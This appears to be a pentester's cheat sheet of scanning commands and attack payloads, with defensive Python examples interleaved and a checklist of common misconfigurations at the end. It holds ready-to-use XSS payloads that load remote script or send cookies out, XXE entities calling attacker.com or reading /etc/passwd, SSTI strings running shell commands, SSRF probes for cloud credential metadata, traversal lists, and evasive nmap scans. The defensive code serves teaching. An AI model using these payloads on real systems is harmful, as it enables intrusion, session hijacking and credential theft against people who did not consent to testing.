Handy Commands & Payloads
Commands and Payloads that I use the most to get the basics covered.
Nmap
Initial Port Scan and Service Scan with Evasive Techniques:
nmap -f -D RND:10 -p- -Pn $TARGET
nmap -sC -sV -p $(nmap -f -D RND:10 -p- -Pn $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',') $TARGET
Other nmap scans:
sudo nmap -Pn -p 3389 -ff --send-eth --script rdp-enum-encryption $IP
Test SSL
testssl $URL
Nikto
nikto -host $URL
nikto -h $URL -O STATIC-COOKIE="Authorization: Bearer..."
Nuclei
nuclei -u $URL
nuclei -u $URL -H "cookie: "
# Use secrets.yaml file for other authentication mechanisms
Nuclei Fuzzer
nf -d $URL
Directory Fuzzing
Gobuster:
gobuster dir -u $URL -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 302,404 -o gobuster_dir.txt
ffuf (Basic):
ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -mc 200 -c -r -sf -t 20 -o ffuf_dir.csv -of csv
Ffuf (API):
ffuf -request api.req -w /opt/SecLists/Discovery/Web-Content/api/common-paths,actions-lowercase,/opt/SecLists/Fuzzing/special-chars.txt -request-proto http -mc 200 -c -r -sf -o ffuf_api_dir.csv -of csv
VHOST Fuzzing
ffuf -H "Host: FUZZ.collect.htb" -u http://collect.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -c -r -sf -ac -o subd_ffuf.txt
SQLi
sqlmap -r app.req --level 5 --risk 3 --batch
XSS Best Payloads
<script>alert(1)</script>
<script src=//14.rs></script>
"><svg onload=alert()>
<embed src=//14.rs>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<a href=javascript:confirm()>click here
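Every payload in the list above only fires when user text reaches the page without context-appropriate encoding. The following Python is an added example (not part of this page) showing the two encodings that neutralise them: `html.escape` for text and attribute contexts, and a scheme allow-list for URL attributes, where escaping alone does nothing against a `javascript:` link. The comment template and the helper names are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Schemes a user-supplied link is allowed to carry (constructed allow-list).
SAFE_URL_SCHEMES = {"http", "https", "mailto"}


def render_comment_vulnerable(text: str) -> str:
    """Interpolates user text into an attribute and into element content unencoded."""
    return f'<div class="comment" data-author="{text}">{text}</div>'


def render_comment_safe(text: str) -> str:
    """html.escape with quote=True encodes & < > " and ', so the text can neither
    close the attribute nor open a tag, whichever of the two contexts it lands in."""
    safe = html.escape(text, quote=True)
    return f'<div class="comment" data-author="{safe}">{safe}</div>'


def safe_href(url: str) -> str:
    """URL attributes need a scheme allow-list on top of escaping: a javascript:
    link survives HTML escaping unchanged. Tabs and newlines are stripped first
    because browsers ignore them inside a scheme ('java\\tscript:' still executes).
    Anything with a disallowed scheme is replaced by a harmless '#'."""
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in SAFE_URL_SCHEMES:
        return "#"
    # Escaping '&' also defeats the entity-encoded variant (&#02java&#115cript:),
    # since the browser then sees a literal '&' rather than a character reference.
    return html.escape(cleaned, quote=True)


if __name__ == "__main__":
    probe = '"><svg onload=alert()>'
    print(render_comment_vulnerable(probe))
    print(render_comment_safe(probe))
    print(safe_href("javascript:confirm()"))
```

The scheme check runs before escaping on purpose: the allow-list decides whether the value may be a link at all, and escaping then makes whatever is left safe inside the quoted attribute.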
SQL Injection Payloads
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #
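The comment-marker variants above (`--`, `/*`, `#`) exist because each database dialect treats them differently, and every one of them depends on the application splicing input into the SQL text. As an added example (not from this page), the following Python runs a few of the payloads through a constructed in-memory SQLite login: `login_vulnerable` builds the query by string formatting, `login_safe` binds the same input as parameters. The users table, probe names and the `demo` helper are constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Input is spliced into the SQL text, so quotes and comment markers rewrite the query."""
    sql = ("SELECT COUNT(*) FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Input is bound as a parameter: the driver never lets it alter the query structure."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def probe(login, conn: sqlite3.Connection, username: str, password: str) -> str:
    """Classify one attempt: 'bypass' (authenticated without the real password),
    'rejected', or 'error' (the injected syntax is invalid in this SQL dialect)."""
    try:
        return "bypass" if login(conn, username, password) else "rejected"
    except sqlite3.Error:
        return "error"


# Probes built from the payload list above, as (username, password) pairs.
PROBES = {
    "admin' --":   ("admin' --", "wrong"),
    "admin' /*":   ("admin' /*", "wrong"),
    "admin' #":    ("admin' #", "wrong"),        # '#' is not a comment in SQLite
    "' OR '1'='1": ("nobody", "' OR '1'='1"),
    "' OR 1=1 --": ("' OR 1=1 --", "wrong"),
}


def demo() -> dict:
    """Map each payload to (outcome with string-built query, outcome with bound parameters)."""
    conn = make_db()
    return {name: (probe(login_vulnerable, conn, user, pw), probe(login_safe, conn, user, pw))
            for name, (user, pw) in PROBES.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:14} string-built={vuln:8} parameterised={safe}")
```

Note the `#` row: it errors rather than bypasses only because SQLite does not treat `#` as a comment, which is exactly why the list carries several terminators. The parameterised version rejects all of them for the same reason, regardless of dialect: the input is data, not grammar.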
NoSQL Injection Payloads
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}
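All of the documents above work by submitting an operator object (`$ne`, `$gt`, `$regex`, ...) where the application expects a string, and letting it flow into the query filter unchanged. As an added example (not from this page), this Python contrasts a filter builder that passes the decoded JSON straight through with one that enforces string-typed credentials; `contains_operator` is the check you would use to log or reject operator-shaped input anywhere in a request body. The function names are constructed for the demonstration.

```python
import json


class InvalidCredentialFormat(ValueError):
    """Raised when a login field is anything other than a non-empty string."""


def contains_operator(value) -> bool:
    """True if any key anywhere in the decoded JSON starts with '$' (a MongoDB operator)."""
    if isinstance(value, dict):
        return any(key.startswith("$") or contains_operator(item) for key, item in value.items())
    if isinstance(value, list):
        return any(contains_operator(item) for item in value)
    return False


def build_filter_vulnerable(body: str) -> dict:
    """Passes the decoded JSON straight into the query filter: the pattern the payloads above abuse."""
    data = json.loads(body)
    return {"username": data["username"], "password": data["password"]}


def build_filter_safe(body: str) -> dict:
    """Accepts only string-typed, non-empty credentials, so an operator object can never reach the query."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise InvalidCredentialFormat("body must be a JSON object")
    creds = {}
    for field in ("username", "password"):
        value = data.get(field)
        if not isinstance(value, str) or not value:
            raise InvalidCredentialFormat(f"{field} must be a non-empty string")
        creds[field] = value
    return creds


def classify(body: str) -> tuple:
    """(does the naive filter carry an operator?, does the strict builder accept the body?)"""
    naive = build_filter_vulnerable(body)
    try:
        build_filter_safe(body)
        accepted = True
    except InvalidCredentialFormat:
        accepted = False
    return contains_operator(naive), accepted


if __name__ == "__main__":
    for body in ('{"username": {"$ne": null}, "password": {"$ne": null}}',
                 '{"username": "admin", "password": "hunter2"}'):
        print(body, "->", classify(body))
```

The type check is the real fix; in a production login the password would also never be part of the query at all (look the user up by username, then verify a password hash in code), which removes the second operator slot entirely.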
SSRF Payloads
# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080
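Every destination in the list above is either a literal internal address or a hostname that resolves to one, so the defence is the same in both cases: resolve first, then refuse loopback, unspecified, link-local (where the cloud metadata endpoint lives), private and reserved ranges. The Python below is an added example (not from this page) of that check, with a constructed DNS table so it runs offline; `system_resolver` is what a deployment would pass instead. Function names and the sample hostnames are assumptions made here.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table so the example runs offline (not real records).
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "internal-service": ["10.0.0.5"],
    "api.example.com": ["93.184.216.34"],
}


def table_resolver(host: str) -> list:
    """Offline stand-in for DNS backed by FAKE_DNS."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed resolver has no entry for {host}")
    return FAKE_DNS[host]


def system_resolver(host: str) -> list:
    """Real resolver: every address the name maps to, A and AAAA alike."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_internal(ip) -> bool:
    """Loopback, unspecified, link-local (169.254.169.254), private, reserved, multicast."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return (ip.is_loopback or ip.is_unspecified or ip.is_link_local
            or ip.is_private or ip.is_reserved or ip.is_multicast)


def check_outbound_url(url: str, resolver=system_resolver) -> tuple:
    """Return (allowed, reason, resolved_ips).

    The caller must connect to one of the returned IPs rather than re-resolving
    the hostname, otherwise a second lookup can be rebound to an internal address."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", []
    host = parts.hostname            # brackets already stripped for IPv6 literals
    if not host:
        return False, "missing host", []
    try:
        ips = [ipaddress.ip_address(host)]                 # literal address
    except ValueError:
        try:
            ips = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"cannot resolve {host}: {exc}", []
    resolved = [str(ip) for ip in ips]
    for ip in ips:
        if is_internal(ip):
            return False, f"{host} resolves to internal address {ip}", resolved
    return True, "ok", resolved


if __name__ == "__main__":
    for candidate in ("http://169.254.169.254/latest/meta-data/", "http://[::1]:80",
                      "http://internal-service:80", "https://api.example.com/v1"):
        print(candidate, "->", check_outbound_url(candidate, table_resolver))
```

Checking every resolved address (not only the first) matters because a name may return a mix of public and private records; the first public one would otherwise mask the rest.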
XXE Payloads
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>
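Whatever the scheme behind `SYSTEM` (file, http, ftp, jar, php, expect, ...), each payload above has to declare its entity inside a DOCTYPE, so the narrowest fix is to refuse the DTD altogether before parsing. This Python is an added example (not from this page) of that gate using the standard library's expat bindings: a throwaway parser aborts on `StartDoctypeDeclHandler`, and only DOCTYPE-free documents reach ElementTree. The `classify` helper and the clean sample document are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised for input that declares a DTD (and therefore could declare entities)."""


def parse_untrusted_xml(data: str) -> ET.Element:
    """Refuse any DOCTYPE before handing the document to the real parser.

    External entities can only be declared inside a DOCTYPE, so forbidding the
    DTD outright removes the whole class; it also stops internal-entity
    expansion bombs, which need the same declaration."""
    gate = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Raising inside an expat handler stops the parse and propagates out of Parse().
        raise UnsafeXML(f"DOCTYPE {name!r} is not accepted in untrusted XML")

    gate.StartDoctypeDeclHandler = on_doctype
    try:
        gate.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from exc
    return ET.fromstring(data)


def classify(data: str) -> str:
    """'rejected: ...' for anything the gate refuses, 'ok: <root>' otherwise."""
    try:
        root = parse_untrusted_xml(data)
    except UnsafeXML as exc:
        return f"rejected: {exc}"
    return f"ok: <{root.tag}>"


if __name__ == "__main__":
    samples = (
        '<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>',
        "<foo><bar>1</bar></foo>",          # constructed clean document
    )
    for sample in samples:
        print(classify(sample))
```

The document is parsed twice, which is acceptable for request-sized input; for anything larger, or when the application needs a DTD, a purpose-built library such as defusedxml (which forbids DTDs and entity expansion by default) is the maintained option.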
SSTI Payloads
# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}
File Inclusion Payloads
../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf
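The traversal strings above succeed when a file path is built from user input and only superficially checked. As an added example (not from this page), the Python below shows the containment check that defeats them: resolve the candidate against the document root, follow symlinks, and require the result to remain under that root component-wise. The base directory and the `is_safe_path` / `demo` helpers are constructed for the demonstration.

```python
import os


def safe_join(base_dir: str, user_path: str) -> str:
    """Return the real path of user_path under base_dir, or raise PermissionError."""
    if "\0" in user_path:
        # A NUL would truncate the path in C-level APIs; reject instead of sanitising.
        raise PermissionError("NUL byte in path")
    # Treat backslashes as separators so Windows-style traversal is judged the same way,
    # and refuse absolute paths outright rather than reinterpreting them.
    normalized = user_path.replace("\\", "/")
    if normalized.startswith("/"):
        raise PermissionError("absolute paths are not accepted")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, normalized))
    # commonpath is component-aware: /var/www/html-private does not match /var/www/html.
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"{user_path!r} escapes {base_dir}")
    return candidate


def is_safe_path(base_dir: str, user_path: str) -> bool:
    """Boolean wrapper around safe_join for reporting and tests."""
    try:
        safe_join(base_dir, user_path)
    except PermissionError:
        return False
    return True


def demo(base_dir: str = "/var/www/html") -> dict:
    """Run a few of the payloads above plus two legitimate paths through the check."""
    samples = (
        "../../../../../../etc/passwd",
        "../../../../../../windows/win.ini",
        "../../../../../../var/www/html/wp-config.php",
        "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
        "images/logo.png",
        "images/../index.php",
    )
    return {sample: is_safe_path(base_dir, sample) for sample in samples}


if __name__ == "__main__":
    for path, ok in demo().items():
        print(f"{'allow' if ok else 'deny ':5} {path}")
```

Because `realpath` follows symlinks, a link inside the web root that points outside it is also refused, which is the behaviour you want for a document root but worth knowing when a legitimate symlinked asset directory stops resolving.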
CRLF Injection Payloads
GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n
POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n
GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n
Easy Vulnerabilities & Security Misconfigurations to Report
Vulnerabilities that could be found in the early stages (first few hours) of a pentest.
Security Headers
Misconfigured Security Headers:
X-Frame-Options
X-XSS-Protection
X-Content-Type-Options
Strict-Transport-Security
Content-Security-Policy (CSP)
Referrer-Policy
Cross-Origin Resource Sharing (CORS)
Insecure CORS Configuration:
Allowing wildcard (*) origin
Allowing untrusted origins
Lack of proper validation
Cookie Attributes
Insecure Cookie Attributes:
Missing HttpOnly flag
Missing Secure flag
Missing SameSite attribute
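The three checklists above (security headers, CORS, cookie attributes) are all decided by a single HTTP response, so they are easy to audit mechanically. The Python below is an added example (not from this page) that inspects a list of response headers as they appear on the wire and returns a finding code for each item on the lists, including the Clickjacking item later on this page (X-Frame-Options, or its CSP `frame-ancestors` replacement). The two sample responses, the finding codes and the trusted-origin parameter are constructed here.

```python
from http.cookies import SimpleCookie

# Headers that should be present on any browser-facing response, with the finding code if absent.
EXPECTED = {
    "strict-transport-security": "hsts-missing",
    "content-security-policy": "csp-missing",
    "x-content-type-options": "nosniff-missing",
    "referrer-policy": "referrer-policy-missing",
}


def audit_response(headers, request_origin=None, trusted_origins=()):
    """headers: list of (name, value) pairs in wire order (Set-Cookie may repeat).
    request_origin: the Origin header the request carried, if any.
    Returns a list of (finding_code, detail) tuples."""
    findings = []
    by_name = {}
    for name, value in headers:
        by_name.setdefault(name.lower(), []).append(value)

    def first(name):
        return by_name.get(name, [None])[0]

    for name, code in EXPECTED.items():
        if name not in by_name:
            findings.append((code, f"{name} header absent"))

    # Clickjacking: either header is acceptable, CSP frame-ancestors being the modern one.
    csp = first("content-security-policy") or ""
    if "frame-ancestors" not in csp and first("x-frame-options") is None:
        findings.append(("clickjacking", "no X-Frame-Options and no CSP frame-ancestors"))

    # The legacy XSS auditor is gone from current browsers; the safe value is 0 or absence.
    xss = first("x-xss-protection")
    if xss is not None and xss.strip() != "0":
        findings.append(("xss-auditor-enabled", f"X-XSS-Protection: {xss}"))

    nosniff = first("x-content-type-options")
    if nosniff is not None and nosniff.strip().lower() != "nosniff":
        findings.append(("nosniff-wrong", f"X-Content-Type-Options: {nosniff}"))

    # CORS: wildcard, the 'null' origin, or reflecting an untrusted Origin are all reportable.
    acao = first("access-control-allow-origin")
    creds = (first("access-control-allow-credentials") or "").strip().lower() == "true"
    if acao == "*":
        findings.append(("cors-wildcard", "Access-Control-Allow-Origin: *"))
    elif acao == "null":
        findings.append(("cors-null-origin", "Access-Control-Allow-Origin: null"))
    elif acao and request_origin and acao == request_origin and acao not in trusted_origins:
        findings.append(("cors-reflected-origin",
                         f"{acao} reflected" + (" with credentials" if creds else "")))

    # Cookies: one Set-Cookie header per cookie, parsed with the stdlib parser.
    for raw in by_name.get("set-cookie", []):
        jar = SimpleCookie()
        jar.load(raw)
        for cname, morsel in jar.items():
            if not morsel["httponly"]:
                findings.append(("cookie-no-httponly", cname))
            if not morsel["secure"]:
                findings.append(("cookie-no-secure", cname))
            if not morsel["samesite"]:
                findings.append(("cookie-no-samesite", cname))
            elif morsel["samesite"].lower() == "none" and not morsel["secure"]:
                findings.append(("cookie-samesite-none-insecure", cname))
    return findings


def finding_codes(headers, **kwargs) -> set:
    """Just the codes, for quick comparison of two responses."""
    return {code for code, _ in audit_response(headers, **kwargs)}


# Constructed sample responses (not captured from any real host).
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("X-XSS-Protection", "1; mode=block"),
    ("Access-Control-Allow-Origin", "*"),
    ("Set-Cookie", "session=abc123; Path=/"),
]
HARDENED_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=63072000; includeSubDomains"),
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ("X-Content-Type-Options", "nosniff"),
    ("Referrer-Policy", "strict-origin-when-cross-origin"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for code, detail in audit_response(WEAK_RESPONSE):
        print(f"{code:30} {detail}")
    print("hardened:", audit_response(HARDENED_RESPONSE))
```

Headers are collected as a list rather than a dict so repeated `Set-Cookie` lines survive; the reflected-origin check needs the Origin the request was sent with, which is why it is a parameter rather than something read from the response.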
Authentication & Session Management
Concurrent Logins Allowed:
Multiple sessions from different IPs
Improper Session Timeout:
Long or no session expiration
Improper Invalidation of Cookie Post Logout:
Session remains active after logout
Weak Password Policies:
No complexity requirements
Lack of rate limiting
File Handling
Unrestricted File Upload:
No file type validation
No file size restrictions
No scanning for malware
Access Controls
Staging Environment Accessible from External Network:
Exposed internal environments
Sensitive Directories Accessible:
/.git/, /.svn/, /backup/, /config/
Web Server Configuration
Clickjacking:
Missing X-Frame-Options header
Weak SSL Ciphers:
Use of deprecated SSL/TLS versions
Weak cipher suites enabled
Web Server Fingerprinting:
Banner Grabbing revealing server information
Information Disclosure
Verbose Error Messages:
Detailed stack traces
Application/Server details in error messages
Directory Listing Enabled:
Ability to list files in web directories
Business Logic & Other Issues
Lack of Rate Limiting:
Brute force or DoS vulnerabilities
No Account Lockout:
Unlimited login attempts
Weak Default Credentials:
Use of default passwords for admin accounts
HTTP Methods:
TRACE/TRACK methods enabled
Referrer Policy:
No Referrer Policy header
API Security:
Lack of authentication
Lack of rate limiting
Exposed sensitive endpoints
Insecure Direct Object References (IDOR):
Direct access to unauthorized resources
Lack of Input Validation:
No sanitization of user input
Additional Points
Backup Files Accessible:
.bak, .old, .save files accessible
Exposed API Keys or Tokens:
API keys or tokens in URLs, JavaScript, etc.
Insufficient Logging and Monitoring:
Lack of logging for security events
Cross-Site Request Forgery (CSRF):
Missing or incorrect CSRF tokens
Insufficient Transport Layer Security:
HTTP instead of HTTPS
Autocomplete Enabled for Sensitive Fields:
Sensitive form fields have autocomplete enabled
Insecure Directories:
/admin/, /config/, /backup/ directories exposed
Insecure Third-Party Integrations:
Unpatched or outdated third-party libraries and frameworks